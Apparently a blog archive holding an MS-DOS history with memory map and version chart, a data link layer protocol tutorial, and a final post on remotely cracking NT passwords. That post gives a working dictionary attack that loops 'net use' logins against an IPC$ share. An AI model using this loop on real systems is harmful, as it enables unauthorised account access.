Earlier, in April 1980, Tim Patterson began writing an operating system for use with Seattle Computer Products' 8086-based (S100 bus micros) computer. Seattle Computer Products decided to come up with their own disk operating system, due to delays by Digital Research in releasing a CP/M-86 operating system. By August 86-DOS or QDOS v0.10 (Quick and Dirty Operating System) was shipped by Seattle Computer Products. It was a 16-bit version of CP/M. Even though it had been created in only two man-months, the DOS worked surprisingly well. A week later, the EDLIN line editor was created. EDLIN was supposed to last only six months, before being replaced, but it endured for longer.

In September Tim Patterson showed Microsoft his 86-DOS, written for the 8086 chip. At this stage Microsoft had no 8086 real operating system to offer, but capitalized when, in October, Microsoft's Paul Allen contacted Patterson, asking for the rights to sell SCP's DOS to an unnamed client (IBM). Microsoft paid less than $100 000 for the rights. Patterson's DOS v1.0 was approximately 4000 lines of assembler source. This code was quickly polished up and presented to IBM for evaluation.

An agreement was reached between the two companies and IBM agreed to accept 86-DOS as the main operating system for their new PC. In February 1981, 86-DOS was run for the first time on IBM's prototype microcomputer. Furthermore, Microsoft purchased all rights to 86-DOS in July 1981.

In August, IBM announced the IBM 5150 PC, featuring a 4.77-MHz Intel 8088 CPU, 64KB RAM, 40KB ROM, one 5.25-inch floppy drive, and PC-DOS 1.0 (Microsoft's MS-DOS), for $3000.

Thus, "IBM Personal Computer DOS v1.0" was available for the introduction of the IBM PC in October 1981. IBM heavily subjected the program to an extensive quality-assurance test and found there to be well over 300 bugs and decided to rewrite the programs. This is why PC-DOS is copyrighted to both Microsoft and IBM.

Some early OEM (Original Equipment Manufacture) versions of DOS had different names such as Compaq-DOS, Z-DOS, Software Bus 86, etc. By version 2.0 Microsoft had succeeded to persuade everyone but IBM to call it MS-DOS.

It is interesting to reflect on the fact that the IBM PC was not originally meant to run MS-DOS. Instead it was supposed to use a (not yet in existence) 8086 version of CP/M. On the other hand, DOS was originally written before the IBM PC was created. CP/M-86 would have been the main operating system except for two things: Digital Research wanted $495 for CP/M-86 (considering PC-DOS was basically free) and many software developers found it easier to port software from CP/M into PC-DOS than into CP/M-86.

The IBM PC was first shipped without an operating system. IBM only started including DOS when the second generation AT/339 came out. A user could order one of three available operating systems: IBM PC-DOS, a version of UCSD p-System (type of integrated Pascal operating system - like the improved BASIC operating systems used by the Commodore 64,) and CP/M-86, which was officially an option even though it was unavailable until later on. Since IBM's $39.95 DOS was much cheaper than anyone else's it soon became the most popular.

An upgrade from DOS v3.3 to v4.0 was solely done by IBM, it was later licenced back to Microsoft. In early 1990 IBM declared that it would be ceasing development of DOS, handing the reigns over to Microsoft from then on.

Microsoft's Press' "MSDOS Encyclopaedia" illustrated an example of a late DOS v1.25 OEM brochure. Microsoft was praising future enhancement to v1.25 including XENIX-compatible pipes, process forks and multitasking, as well as "graphics and cursor positioning, kanji support, multi-user and hard disk support and networking". Despite these large aspirations, Microsoft failed to produce the forks, multitasking and multi-user support (at least in US versions of DOS).

The notice claimed: "MS-DOS has no practical limit on disk size. MS-DOS uses 4-byte XENIX OS compatible pointers for a file and disk capacity of up to 4 gigabytes."

For the record they actually delivered:

XENIX-compatible pipes:
DOS 2.0 ("|" operator)
---
process forks, and multitasking:
eDOS 4.0 (not delivered in the US)
---
multi-user:
never delivered
---
graphics and cursor positioning:
DOS 2.0 (ANSI.SYS)
---

kanji support:
DOS 2.01, 2.25 (double-byte character set)
---
hard disk support:
DOS 2.0 (subdirectories)
---
networking:
DOS 3.1 (file locking support MS Networks)
DOS 6.0 (bundled Interlink in with DOS)
---

Microsoft launched an aggressive marketing campaign for MS-DOS. Early Microsoft advertisements promoted DOS' XENIX-like features and promised XENIX functionality in future releases.

Microsoft had announced their intention of building a multi-user, multitasking operating system since as early as 1982. They Shipped beta versions of "DOS 4.0" in 1986/87 before v3.3 was even announced. Microsoft UK had announced that they had licenced v4.0 to Apricot Computers and the French Postal Service was supposed to be running it.

MS-DOS and PC-DOS have been run on more than just the IBM-PC and clones:

Hardware PC Emulation:
Apple II TransPC 8088 board Apple MacIntosh AST 80286 board Atari 400/800 Co-Power 88 board Atari ST PC-Ditto II cartridge Amiga 2000 8088 or A2286D 80286 Bridge Board IBM PC/RT 80286 AT adapter Kaypro 2 Co-Power Plus board Software PC Emulation:
Apple MacIntosh SoftPC Atari ST PC-Ditto I IBM RS/6000 DOS emulation DOS Emulation:
AIX (IBM RS/6000) DOS emulation with "PCSIMulator" OS/2 1.x DOS emulation in "Compatibility Box" OS/2 2.x executes Virtual DOS Machine QNX DOS window SunOS DOS window XENIX DOS emulation with DOSMerge

The Memory Map:
About a decade ago, standard memory configurations were 256KB, 512KB or 640KB on computers. This memory was often looked at in segments of 65536 bytes or 64KB. The user is allocated 10 segments, or 640KB and the system is allocated the remaining 6, or 384KB. The original designers of the 8088, decided that no one would ever possibly need more than 1MB of memory (yeah, right!). So they built the machine so that it couldn't access above 1 MB. To access the whole MEG, 20 bits are needed. This allows a total of 220 combinations of bits, that is 1048576 (= 1024*1024 or 1 MB) different numbers, each of which represents an address of a single byte of data. The problem was that the registers only had 16 bits, and if they used two registers, that would be 32 bits, which was way too much (they thought). So they came up with a rather brilliant (not!) way to do their addressing - they would use two registers. They decided that they would not be 32bits, but the two registers would create 20 bit addressing. And thus Segments and Offsets were created.

**Note: it helps to understand assembly code.

OFFSET = SEGMENT*16
SEGMENT = OFFSET/16 - note that the lower 4 bits are lost

SEGMENT * 16 |0010010000010000----| - range (0 to 65535)*16
+
OFFSET |----0100100000100010| - range (0 to 65535)
=
20 bit address |00101000100100100010| - range 0 to 1048575 (1 MB)
\----- DS -----/
\----- SI -----/
\- Overlap-/

This shows how DS : SI is used to construct a 20 bit address.

Segment registers are: CS, DS, ES, SS. On the 386+ there are also FS & GS.

Offset registers are: BX, DI, SI, BP, SP, IP. In 386+ protected mode, any general register (not a segment register) can be used as an offset register (except IP, which isn't accessable).

CS : IP Points to the currently executing code.
SS : SP Points to the current stack position.

If you'll notice, the value in the segment register is multiplied by 16 (or shifted left 4 bits) and then added to the offest register. Together they create a 20 bit address. Thus, there are many combinations of the segment and offset registers that will produce the same address. The standard notation for a SEGment/OFFset pair is:

SEGMENT : OFFSET or A000 : 0000 (in hexadecimal).

Where SEGMENT = 0A000h and OFFSET = 00000h.
(This happens to be the address of the upper left pixel on a 320x200x256 screen.)
You may be wondering what would happen if you were to have a segment value of 0FFFFh and an offset value of 0FFFFh.

Notice how <0FFFFh * 16 (or 0FFFF0h ) + 0FFFFh = 1,114,095> is larger than 1,048,576 (or 1 MEG).

This means that more than 1 MB of memory is actually accessible! Well, to actually use that extra bit of memory, you would have to enable something called the A20 line, which just enables the 21st bit for addressing. This little extra bit of memory is usually called "HIGH MEMORY" and is used when you load something into high memory or say DOS = HIGH in your AUTOEXEC.BAT file or DEVICEHIGH=MOUSE.SYS in your CONFIG.SYS file (HIMEM.SYS and EMS386.EXE actually manage that).

Here is an illustration of a typical memory map:

The IBM PC handles its address space in 64k segments, divided into 16k fractions and then further as necessary:

*********************************************************************
*start *start*end * *
*addr. *addr.*addr.* usage *
*(dec) * (hex) * *
*********************************************************************
* *640k RAM Area* *
*********************************************************************
* 0k * * start of RAM, first K is interrupt vector table *
* 16k *0000-03FF* PC-0 system board RAM ends *
* 32k *0400-07FF* *
* 48k *0800-0BFF* *
*********************************************************************
* 64k *1000-13FF* PC-1 system board RAM ends *
* 80k *1400-17FF* *
* 96k *1800-1BFF* *
* 112k *1C00-1FFF* *
*********************************************************************
* 128k *2000-23FF* *
* 144k *2400-27FF* *
* 160k *2800-2BFF* *
* 176k *2C00-2FFF* *
*********************************************************************
* 192k *3000-33FF* *
* 208k *3400-37FF* *
* 224k *3800-3BFF* *
* 240k *3C00-3FFF* *
*********************************************************************
* 256k *4000-43FF* PC-2 system board RAM ends *
* 272k *4400-47FF* *
* 288k *4800-4BFF* *
* 304k *4C00-4FFF* *
*********************************************************************
* 320k *5000-53FF* *
* 336k *5400-57FF* *
* 352k *5800-5BFF* *
* 368k *5C00-5FFF* *
*********************************************************************
* 384k *6000-63FF* *
* 400k *6400-67FF* *
* 416k *6800-6BFF* *
* 432k *6C00-6FFF* *
*********************************************************************
* 448k *7000-73FF* *
* 464k *7400-77FF* *
* 480k *7800-7BFF* *
* 496k *7C00-7FFF* *
*********************************************************************
* 512k *8000-83FF* *
* 528k *8400-87FF* *
* 544k *8800-8BFF* the original IBM PC-1 BIOS limited memory to *
* 560k *8C00-8FFF* 544k *
*********************************************************************
* 576k *9000-93FF* *
* 592k *9400-97FF* *
* 609k *9800-9BFF* *
* 624k *9C00-9FFF* to 640k (top of RAM address space) *
* 639k * * some RLL and SCSI hard disk adapters, some four *
* * * floppy controller cards, some AMI and PS/2 BIOS, *
* * * and assorted other cards sometimes try to use the*
* * * last K for storing temporary data. This can *
* * * cause trouble with programs which assume they *
* * * have a full 640k, and will prevent backfilling *
* * * memory with some memory managers. Beware! *
*********************************************************************
*A0000 ***** 64k ***** EGA/VGA starting address *
*A0000 ***** 64k ***** Toshiba 1000 DOS ROM (MS-DOS 2.11V) *
*********************************************************************
* 640k *A0000-A95B0* MCGA 320x200 256 color video buffer *
* * -AF8C0* MCGA 640x480 2 color video buffer *
* * -A3FFF* *
* 656k *A4000-A7FFF* *
* 672k *A8000-ABFFF*this 64k segment may be used for contiguous DOS *
* 688k *AC000-AFFFF*RAM with appropriate hardware and software *
*********************************************************************
*B0000 ***** 64k ***** mono and CGA address *
*********************************************************************
* 704k *B0000-B3FFF*4k mono display | The PCjr and early Tandy 1000*
* 720k *B4000-B7FFF* | BIOS revector direct write to*
* 736k *B8000-BBFFF*16k CGA | the B8 area to the Video Gate*
* 756k *BC000-BFFFF* | Array and reserved system RAM*
*********************************************************************
*C0000 ***** 64k *************** expansion ROM *
*********************************************************************
* 768k *C0000-C3FFF*16k EGA BIOS C000:001E EGA BIOS signature *
* * * (the letters 'IBM') *
* *C0000-C7FFF*32k VGA BIOS extension (typical) *
* 784k *C4000-C5FFF* *
* *C6000-C63FF*256 bytes IBM PGC video communications area *
* *C6400-C7FFF* *
* 800k *C8000-CBFFF*16k hard disk controller BIOS, drive 0 default *
* *CA000 * some 2nd floppy (HD) controller BIOSes *
* 816k *CC000-CDFFF* 8k IBM PC Network NETBIOS *
* *CE000-CFFFF* *
*********************************************************************
*D0000 ***** 64k ***** expansion ROM *
*********************************************************************
* 832k *D0000-D7FFF*32k IBM Cluster Adapter | PCjr first ROM cart. *
* * DA000*voice communications | address area. *
* 848k *D4000-D7FFF* | Common EMS board *
* 864k *D8000-DBFFF* | paging area. *
* *D8000-DBFFF* IBM Token Ring default Share RAM address *
* *DC000 * IBM Token Ring default BIOS/MMIO address *
* 880k *DC000-DFFFF* | *
* *DE000 *4k TI Pro default video buffer *
*********************************************************************
*E0000 ***** 64k ***** expansion ROM *
* wired to ROM sockets in the original IBM AT *
* used by ABIOS extensions on some PS/2 models *
*********************************************************************
* 896k *E0000-E3FFF* | PCjr second ROM cart.*
* 912k *E4000-E7FFF* | address area *
* 928k *E8000-EBFFF* | *
* 944k *EC000-EFFFF* | spare ROM sockets on *
* * * | IBM AT (reserved in *
* * * | hardware) *
*********************************************************************
*F0000 ***** 64k ***** system *
*********************************************************************
* 960k *F0000-F3FFF*reserved by IBM | cartridge address *
* 976k *F4000- * | area (PCjr cartridge *
* *F6000 *ROM BASIC Begins | BASIC) *
* 992k *F8000-FB000* | *
* 1008k*FC000-FFFFF*ROM BASIC and original | *
* * *BIOS (Compatibility BIOS | *
* * *in PS/2) | *
* 1024k* FFFFF*end of memory (1024k) for 8088 machines *
*********************************************************************
* 384k *100000-15FFFF* 80286/AT extended memory area, 1Mb mbd. *
* 15Mb *100000-FFFFFF* 80286/AT extended memory address space *
* 15Mb *160000-FDFFFF* Micro Channel RAM expansion (15Mb ext. mem) *
* 128k *FE0000-FFFFFF* system board ROM (PS/2 Advanced BIOS) *
*********************************************************************
* 64k *C0000000-C000FFFF* Weitek "Abacus" math coprocessor *
* * * memory-mapped I/O *
+*******************************************************************+

Timeline:
In May 1982, Microsoft released MS-DOS v1.1 to IBM, for the IBM PC. It supported 320KB double-sided floppy disk drives. Microsoft also released MS-DOS v1.25, similar to v1.1 but for IBM-compatible computers.

In March 1983, MS-DOS v2.0 for PCs is announced. It was written from scratch, supporting 10 MB hard drives, a tree-structured file system, and 360 KB floppy disks. October saw IBM introducing PC-DOS v2.1 with the IBM PCjr.

In March 1984, Microsoft released MS-DOS v2.1 for the IBM PCjr. Microsoft released MS-DOS v2.11 a short time later. It included enhancements to better allow conversion into different languages and date formats. In August, Microsoft released MS-DOS v3.0 for PCs. It added support for 1.2MB floppy disks, and bigger (than 10 MB) hard disks. In November, Microsoft released MS-DOS v3.1, adding support for Microsoft networks.

In January 1986, Microsoft released MS-DOS v3.2. It added support for 3.5-inch 720 KB floppy disk drives. Microsoft released MS-DOS v3.25 as well.

In April 1987, IBM announced DOS v3.3 for PCs, for $120. In August Microsoft shipped MS-DOS v3.3. In November Compaq shipped MS-DOS v3.31 with support for over 32MB drives.

In 1988 Digital Research transformed CP/M into DR DOS. In June Microsoft released MS-DOS v4.0, including a graphical/mouse interface. In July IBM shipped DOS v4.0, which included a shell menu interface and support for hard disk partitions over 32 MB. In November Microsoft released MS-DOS v4.01.

In April 1990, Microsoft introduced Russian MS-DOS v4.01 for the Soviet market.
May saw Digital Research releasing DR DOS v5.0.

In June 1991, Microsoft released MS-DOS v5.0. It added a full-screen editor, undelete and unformat utilities and task swapping. GW-BASIC is replaced with Qbasic, based on Microsoft's QuickBASIC. In September Digital Research Inc. releases DR DOS v6.0, for $100.

In March 1993, Microsoft introduced the MS-DOS v6.0 upgrade, including DoubleSpace disk compression. 1 million copies of the new and upgraded versions were sold through retail channels within the first 40 days. In November, Microsoft released MS-DOS v6.2.

In February 1994, Microsoft released MS-DOS v6.21, removing DoubleSpace disk compression. April IBM releases PC-DOS v6.3. In June Microsoft releases MS-DOS v6.22, bringing back disk compression under the name DriveSpace.

In February 1995, IBM announced PC DOS v7, with integrated data compression from Stac Electronics (Stacker). In April, IBM released PC DOS v7. In August of 1995 Microsoft introduced Windows 95, it included MS DOS v7.0 but it's clear that DOS is going to remain a constant for several years to come.

DOS HISTORY CHART:(system file sizes in bytes)
DOS TYPE AND VERSION DATE COMMAND.COM IO.SYS or IBMBIO.COM MSDOS.SYS or IBMDOS.COM
PC 1.0 8-4-81 3,231 1,920 6,400
MS 1.0 8-4-81 3,231 1,920 6,400
PC 1.1 5-7-82 4,959 1,920 6,400
PC 2.0 3-8-83 17,792 4,608 17,152
MS 2.0 3-8-83 17,792 4,608 17,152
PC 2.1 10-20-83 17,792 4,736 17,024
MS 2.11 11-17-83 15,957 6,836 17,176
PC 2.11 5-30-84 18,272 5,120 17,408
PC 3.0 8-14-84 22,042 8,964 27,920
MS 3.0 8-14-84 22,042 8,964 27,920
PC 3.1 3-7-85 23,210 9,564 27,760
MS 3.1 3-7-85 23,210 9,564 27,760
PC 3.2 12-30-85 23,791 16,369 28,477
MS 3.2 7-7-86 23,612 16,138 28,480
MS 3.21 5-1-87 23,948 18,501 28,480
PC 3.3 3-17-87 25,307 22,100 30,159
MS 3.3 7-24-87 25,276 22,357 30,128
MS 3.3a 2-2-88 25,308 22,398 30,128
MS 4.0 10-6-88 37,254 32,874 36,903
MS 4.01 11-30-88 37,396 33,173 37,180
PC 4.01 4-3-89 37,396 33,173 37,180
MS 4.01a 4-7-89 37,557 33,337 37,376
MS 5.0 4-9-91 33,430 37,394 47,845
PC 5.0 5-9-91 47,987 33,430 37,378
PC 5.001a 2-28-92 48,006 33,446 37,378
PC 5.02 9-1-92 47,990 33,718 37,362
MS 6.0 3-10-93 52,925 40,470 38,138
IBM 6.1 6-29-93 52,589 40,964 38,138
PC 6.1 9-30-93 52,797 40,964 38,138
MS 6.2R0 9-30-93 54,619 40,566 38,138
MS 6.22 5-31-94 54,645 40,774 38,138
PC 6.3 12-31-93 54,654 40,758 37,174
**Note: Microsoft had no official version of MS DOS prior to DOS 3.2. Only OEM versions were sold with the PC by the computer manufacture.

Future of DOS:
At first, many people would answer saying that DOS has no future. It has seen it's heyday and now it's up to high-resolution GUI's (Graphic User-Interfaces - e.g. Windows 95) to lead the operating system pack. But let's not be too quick to dismiss it. There are many reasons why DOS is an essential part of many of today's finest systems.

Talk to mainstream computer industry "specialists" and they'd have you believe that there is no longer any place for it. Why? Because they don't understand the special speed and performance requirements unique to systems other than "supercomputers with neuro-networking". I'm talking about the many hundreds of thousands of users that depend on older systems to support their businesses. Low-tech industries rely heavily on computers with old versions of DOS installed on them. The average "business person" here doesn't need anything better than a 486SX with 8MB of RAM to run their MS-DOS based accounting program. This shouldn't be made redundant just because DOS is so-called "outdated". This is also where the highest resistance to the removal of DOS has come from.

Despite this, many people believe that old DOS programs are becoming redundant because they are not Y2K compliant. But I say that DOS programs are simplistic by nature and can easily be patched to be compatible. Even that seems more sensible than installing Windows and taking up copious quantities of HD space with utilities that have a hundred times more features than you'll ever figure out, let alone use. Don't even get me started on the redundant registry entries and .dll files that remain after 'removing' shareware and evaluation software on Win95. You won't get any of that in DOS!

Win95 and DOS can be compared to bank notes and coin-change respectively. Win95 caters for the multiuser/multitasking system which has convenience similar to the spending of large bank notes. DOS caters for the single-task user without the need of extraneous functions and add-ons. Like coins, DOS adds up for too many individuals not to have a large economic impact if it were removed.

One of the great 'new features' of Win95 is it's Recycle Bin (thanks Mac!). But if it's so great, what does a user do if he or she wants to recover a file after having emptied the bin? Nothing? Tough luck? Nope. DOS to the rescue! The user simply needs to 'Restart in MS-DOS mode', type in and confirm the LOCK command, go to the directory where the file was stored (or 'c:\recycled') and undelete it using DOS v6.2x's old UNDELETE.EXE (remember: restart the computer or type in UNLOCK to proceed safely). Conclusion: Windows couldn't have been used to retrieve that 'permenantely' deleted file without using extraneous software (eg. Norton Utilities).

Okay, so I've been heavy-handed about my support for DOS over Windows. Sue me, I like it - it's my 'oldschool'. ;) Although...

Many people support DOS in that they perceive it to be a magical operating system that is just perfect for games. Well I have a challenge for them - TRY PROGRAMMING FOR IT! I'll bet money that half the reason why Interplay's relatively new game "DTUM" didn't ship with network options was simply because it is a DOS game and they would have had to do the bulk of the work themselves. Simply put: if Microsoft wants to write network code for game developers (via Direct Play) or add support to most if not all sound cards (Direct Sound), a designer would be foolish not to take advantage of it. Thus guaranteeing MS role in the games market. Even the mighty Quake(TM) released Windows/OpenGL versions (sell out? - you decide).

Two factors determine the user's productivity: how long it takes to tell the computer to do something, and how long the computer takes to do it. The former is largely dependent on how you've customized your system with shortcuts, macros, and AutoLISP routines and the platform is not particularly relevant. The latter is partly dependent on your choice of platform - any kind of Windows inevitably suffers compared with DOS. Why? Because DOS remains on a lower user level compared to Win95 and thus keeps more of the system's resources free.

Even Windows 98 - the most recent operating system released by Microsoft to date retains elements of DOS for users - obviously Microsoft recognises the great need for it. These elements, however, aren't pure DOS. They're part of Win95/98. A shell (pardon the pun) of its former self if you will. The question is, will Win98 be able to run without these elements? One of the intriguing questions being asked today since the discovery that Win95 works with DR-DOS 7.01, is how dependent on DOS is/was Win95? I would have called this myth until I went to fix a Win95 problem and by accident discovered that Win95 appears and runs on top of DOS.

So was it, in fact, essential for Microsoft to retain DOS? Was Win95 already so intricately (/technically) dependent on DOS that the Win98 upgrade wouldn't work without it? Probably not, although speculation is widespread.

I believe that DOS will remain for a few years to come at least. Sentimentality alone can't keep it around forever though and it's only a matter of time before somebody finds a way of phasing it out completely. But not without meeting resistance from individuals for which DOS provides an efficient service. As a DOS junkie, I find it's faster to type many commands or use batch files than having to click and move files around in Windows. What can I say? The mouse slows me down and I think 'user-friendliness' is a sham.

Postscript:
I know what many of you are thinking and I agree: MS OS's suck, get Linux. =)

Bibliography:
BOOKS:

Author(s): Title: Publisher:
Gookin, Dan DOS for Dummies (3rd Ed) IDG Books International
Brown, Margaret Learning DOS & Windows DDC Publishing
Edstrom, Jennifer Barbarians Led by Bill Gates Henry Holt & Company
Erwin, Robynne User Friendly Wallace Bradely Printers
Jamsa, Kris A DOS : The Complete Reference Osborne McGraw-Hill

URLS:
http://members.xoom.com/mhoulden/dosref.htm - Complete DOS reference
http://www.microtec.net/~dlessard/dos.htm - DOS history timeline
http://www.a1computers.net/pcdoshis.htm - DOS history chart
http://clarey.com/dosisdead.html - DOS is dead forum

DATA LINK LAYER DESIGN AND PROTOCOLS

2009-02-05T23:15:00.000-08:00

References:
1. "Computer Networks", 3rd Edition, Andrew S. Tanenbaum
2. "Computer Networks, A System Approach", 3rd Edition
Peterson, Davy, Kaufmann

1.1 Introduction

In this chapter we will discuss the services the datalink layer of the
networking stack is required to have and the various existing layer 2
protocols which cater to these requirements in different ways. The job of the
datalink layer to transfer the bits to the destination machine, which then can
be handed over to the network layer for processing. The data link layer in
itself receives a raw stream of bits for the physical layer, which itself could be
built on different technologies like cable, dsl, wireless, optical fiber to name a
few. The actual communication path between any two adjacent hosts can be shown as
below:

HOST 1 (SENDER) HOST 2 (RECEIVER)
------------- -------------
| | | |
|___________| |___________|
| | LAYER 4 | | TRANSPORT (TCP/UDP)
|___________| |___________|
| . | LAYER 3 | . | NETWORK (IP)
|_____|_____| |_____|_____|
| | | LAYER 2 | | | DATALINK (PPP)
|_____|_____| |_____|_____|
| | | LAYER 1 | | | PHYSICAL
|_____|_____| |_____|_____|
| |
\_______________________________________/

ACTUAL DATA PATH

Figure 1.1 Communication channel between two adjacent hosts

(NOTE: By adjacent we mean two hosts which are connected by a physical connection)

Shown above are the lower 4 layers of the OSI (Open Systems Interconnection) Reference
Model.

1.2 Design Issues

The datalink layer is designed to offer the following functionalities:

(A) Provide a well-defined service interface to the network layer (layer 3).
Depending on the efficiency and error rate of the underlying physical
layer, the datalink layer can be designed in any of the three ways:

(a) Unacknowledged connectionless service. This consists of the source host
sending independent frames to the destination host without any sort of
feedback/acknowledgment mechanism.There is no connection setup or release.
Frame recovery due to line noise is left to the network layer. This kind of
service is appropriate for high speed, low error communication channels
such as an optical fiber network.

(b) Acknowlegded connectionless service. Communication channels which are
more error prone and hence require more reliable communication implement
a feedback mechanism for each frame sent between two hosts. This enables
the sender to know if the frame has arrived correctly or not. This ack
sending mechanism is not a requirement but an optimization, because the
transport layer can always send a message and wait for it to be
acknowledged. However a message, (a unit of data in the transport layer)
consists of several frames, (unit of data in the datalink layer), so the
re-transmission of each faulty received message would bear a lot of
overhead. Such a mechanism is useful on wireless channels which are
inherently unreliable.

(c) Acknowledged connection-oriented service. This is the most
sophisticated service the datalink layer can provide to the network
layer. In this service the source and destination hosts establish a
connection before any transfer of data takes place. Each frame is
received in the same order it is sent in. The service also gaurantees
that each frame is received only once.Communication between two hosts
takes place in three phases. First phase is connection setup, during
which each side initalizes counters and variables to keep track of
frames. Second phase consists of actual frame transmission and the
third phase consists of connection release, freeing up the resources
and buffers when the transfer is done.

(B) Framing
The datalink layer receives a raw bit stream from the underlying physical
layer. This bit stream is not gusranteed to be error free. On a noisy
communication channel the received number of bits maybe less/more, and/or
different than the ones transmitted. In order to provide a reliable
transfer to the network layer the data link layer breaks the bit stream
into frames and computes the checksum for each frame. This checksum is
also transmitted along with the frame. The destination host on receiving a
frame, computes another checksum from its data and compares it to the one
transmitted. This enables the datalink layer of the destination host to
detect and possiblly correct frames, depending upon the method the checksum
is computed in. Some methods used for framing are:
- Character count: The number of characters in the frame are stored in a
field of the header attached to the frame.
- Starting and Ending characters with character stuffing.Each frame starts
with a known ASCII character sequence DLE STX and ends with the sequence
DLE ETX. (DLE IS Data Link Escape, STX is Start Of Text, ETX is End of
Text). A serious problem with this method is that the frame data itself
could contain any of these sequences.
- Starting and Ending characters with bit stuffing: This method solves the
above mentioned problem by stuffing an additional ASCII DLE for every DLE
character in the data.The data link layer of the destination host is then
responsible for removing these bit stuffings from the frame data before
assembling the frames.

(C) Error Control, Sequencing frames and sending control frames for feedback.
A bad communication channel can cause a variety of strange events during
communication, flipping of bits, losing bits from a frame, new bits in the
frame, frames completely disappearing, either host going down.
To communicate the receiving of a correct or incorrect frame the receiver
host sends postive or negative acknowledgements accordingly to the sender
host.This would cause the sender to hang forever waiting for an ack frame.
The sender can have a timeout to resend the frame again if it doesn't
receive an ack in a given time period. To prevent the recipient data link
layer from passing the same frame more than once to the network layer,each
outgoing frame is assigned a sequence number. This whole managing of
timers and frame sequencing is an integral part of data link layer design.

(D) Flowcontrol, control the rate of data transmission between two hosts.
This is another of the important issues in the design of the data link
layer, how to coordinate the rate of transmission between two hosts.
What if the sender is sending data at a much faster rate than the receiver
can process/accept, causing dropping of packets at the receiver end
which further causes the sender to timeout on the ack packets it is
expecting, causing restransmission, leading to a less efficient network.
The sender in such a case is usually throttled by using a feedback
mechanism. There are various ways in which the receiver communicates
to the sender using control frames about the number/rate of packets it
can accept comfortably.

1.3 Elementary Data Link Protocols

1.3.1 An unrestricted simplex protocol:
This is a simple data link protocol which makes certain assumption
which are far from true in the real world, but its sole purpose is
to explain the working of the data link layer and then incrementally
taking the assumptions off.
Assumption 1: Data is transmitted in only one direction
Assumption 2: At both ends the network layers are always ready
Assumption 3: Infinite buffer size of the sender, receiver
Assumption 4: There is no error on the communication channel

PSUDO CODE:

void sender(void)
{
frame f;
packet p;

while (TRUE)
{
get_packet_from_network(p);
packet_to_frame(p,f);
send_frame_to_physical_layer(f);
}
}

void receiver(void)
{
frame r;
packet p;
while(true) {
get_frame_from_physical_layer(r);
frame_to_packet(p,r);
send_packet_to_network(p);
}
}

1.3.2 A Simplex Protocol for a Noisy Channel
Consider Assumption 4 is no longer true, frames can be lost or
damaged. But damaged frames can be detected by the receiver.
Both these protocols suffer from a number of flaws, frames
submitted out of order, duplication of frames, if an ack frame
is lost the sender is kept waiting.
Protocols in which the sender waits for an acknowledgment before
sending the next frame are called ARQ (Automatic Repeat Request).
The protocols have a timeout for retransmission to deal with lost
frames. This still does not solve the problem of duplication which
requires for the frames to have sequence numbers.

1.3.3 Sliding Window Protocols
All the previously discussed protocols could possibly be used for
a unidirectional data transfer, in the real world we need
a bidirectional communication channel. One way of doin this would
be to have two seperate channels one from the data ( forward)
channel and one for its acknowledgments (reverse), but the reverse
channel would almost be entirely wasted. A big improvement over
this is using the same channel for transmitting data and control
frames. When a data frame arrives, instead of immediately sending
a control frame(ack), the data link layer waits for the network
layer to pass it a message, and the ack is sent along with the
data frame. This greatly reduces network traffic. This is known as
PIGGYBACKING.
In all sliding window protocols, each outbound frame
contains a sequence number from 0 to 2^n -1, so the first n-bits
are used for the seq. numbers. Both the sender and the receiver
maintain their own window, which could have different sizes. Some
protocols require a fixed size, while some can be changed as frames
are sent and received. The "Stop and Wait" protocol is a particular
Sliding Window protocol with n=1.
Until now we had made the assumption that the transmission time
required for a frame to arrive at the receiver plus the transmission
time for the acknowledgment to come back is negligible. Consider a
60 kbps satellite channel with a 600-msec round-trip propogation
delay. Let the frame size be 1200 bits, at t = 0, the sender starts
sending the first frame, at t = 20 msec, the frame has been completely
sent, now at t=320 msec the frame fully arrives at the receiver, while
the sender gets the ack back at t= 620 msec. The sender in this case
was blocking for over 90% of the time.
To overcome this problem, there is another class of sliding window
protocol called "Go Back N". In this the sender is allowed to transmit
upto 'w' frames before blocking. With the right choice of 'w', the
sender is able to continously transmit frames for a time equal to the
round trip time without filling up the window. This technique is called
PIPELINING. If the receiver has a window size of 1, then on receiving
an erroneous frame, the receiver stops sending acks to all the frames
received subsequently, the sender eventually times out and
retransmits the remaining frames again. A better solution is when the receiver
has a window size > 1, and it first collects all the correct frames and
sends acks for them to the sender, when the sender realizes it hasn't
received the acks for all the data frames it sent, it resends the one
with missing acks. This is known as "Selective Repeat".

Remotely Password Cracking NT Systems

2009-02-05T23:07:00.000-08:00

In this tutorial, you will learn how to crack a nt password remotely. This is only for educational services only. If you use this information to penetrate a system you don't have access to; then you are breaking the law.

So how will we be doing this? We will remotely crack the nt system through SMB. In other words through the Server Message Block. The method that I will be showing you is attacking the famous file and printer sharing service. The file and printer service uses the SMB.

In order for us to do this, we will be using the net use command in the command prompt. With this command we can try and log into the system. If you have ever used telnet or ssh to log into a linux box, then think of it that way. When we use the net use command with a * (asterisk) it will prompt us for the password. If you type in the correct password then you will be logged in. Just remember that file and printer sharing must be turned on. If it's not, then you will not be able to log in. So here is an example to understand how this all works.

c:\> net use \\192.168.1.125\IPC$ * /u:Administrator

Lets say there is an account named skiddie. Then you can try this.

c:\> net use \\192.168.1.125\IPC$ * /u:skiddie

Now you should have a good idea what needs to be done. Find all the users on the system. That is another tutorial and will not be covered here. Sometimes there are NULL passwords. What does this mean. It means there is no password at all. Just hit enter and you are in. I know what you are thinking. I am not going to sit there and keep typing passwords. For those out there that understand how to program will be thinking of writing a password cracker. I myself have done the same thing. Then one night of reading I read about a lot easier way of using a list of passwords in a file. No need to code a password cracker in c; just use the for command. Before trying this method, you should understand how to use this command and what the options mean. Make sure you read how to use the for command. Every windows hacker must read this. It has made things a lot easier for me.

To understand the for command; type this in a command prompt.

c: for /?

We will use the for command to open a file and list all the words in the file. First make a text file named words.txt; then place these words in that file.

hacker
cracker
whitehat
blackhat
mircoshaft
linux
freebsd

Now bring up the command prompt. Go to the directory where the words.txt file is located. The for command will not work if your not in the same directory as the words.txt file. Type this comand and you will see all the words in the file.

FOR /F "tokens=1" %i in (words.txt) do @echo %i

That command will list all the words in the words.txt file in the command prompt window. If you have a dictionary file; then you can use it to crack an account on a nt system with file and printer sharing turned on. You will use this command for the nt system.

FOR /F "tokens=1" %i in (words.txt) do net use \\192.168.1.125\IPC$ %i /u:Administrator

Instead of using the echo command we use the net use command. You will notice that I used %i after IPC$ instead of a asterisk. Now the net use command will loop through all the words in your dictionary file; try them as the password for the Administrator account.

